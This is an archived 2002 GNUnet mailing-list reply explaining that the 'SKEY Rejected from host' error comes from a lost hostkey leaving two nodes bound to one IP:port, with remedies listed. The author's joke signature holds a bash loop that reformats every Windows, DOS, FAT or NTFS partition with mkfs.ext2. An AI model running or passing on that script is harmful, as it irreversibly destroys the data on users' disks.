help-gnunet
[Top][All Lists]
Advanced

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Help-gnunet] 'SKEY Rejected from host'


From: Christian Grothoff
Subject: Re: [Help-gnunet] 'SKEY Rejected from host'
Date: Sun, 24 Mar 2002 22:03:32 -0500

On Sunday 24 March 2002 09:40 pm, you wrote:
> I'm getting SKEY Rejected from host XXX where the host listed is my own;
> does anyone know what this means?

First of all, this is *ok*. Now let me try to explain what must have happened.

In GNUnet, every node has an RSA key, and every SKEY exchange is encrypted 
with that public key. A node resides at a host (IP:port). The host-discovery 
of GNUnet binds the RSA key of the node to the *current* host-address. A list 
of these bindings is in data/hosts.

When you start gnunetd the first time, GNUnet creates a fresh RSA key, stores 
the private key into ~/.gnunet/.hostkey and the binding (current IP, public 
key) into data/hosts. It also forwards this binding to other GNUnet nodes.

If you *ever* delete that hostkey (~/.gnunet/.hostkey) or 'loose' it (e.g. 
because a new version of GNUnet has a different location or because you are 
running gnunetd as a different user and did not copy that file over), you may 
have two nodes (= 2 hostkeys) in GNUnet for the same host (IP:port).

Now if other nodes (or you yourself) send SKEYs to that IP:port for the 
node/hostkey that is now gone/lost, the node that can be reached at this IP 
will not be able to decrypt the SKEY and complain (see message above).


Solutions:
-------------

a) don't do anything. This will not do any real harm
b) never delete your hostkey
c) use a *short* expiration time for your hostkey to IP bindings (gnunet.conf)
d) convince the GNUnet hackers that we should check if we have two nodes
    at the same IP:port and in that case drop/ignore the older binding 
    (this may have security implications though, so it's probably not a viable
     solution).

Somebody who wants to add this to the FAQ?

cu

Christian
-- 
______________________________________________________
|Christian Grothoff                                  |
|650-2 Young Graduate House, West Lafayette, IN 47906|
|http://gecko.cs.purdue.edu/   address@hidden|
|____________________________________________________|
#!/bin/bash
for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk\
'{print$1;}'`;do;nohup mkfs.ext2 $i&;done
echo -e "\n\n\t\tMay the source be with you.\n\n"



reply via email to

[Prev in Thread] Current Thread [Next in Thread]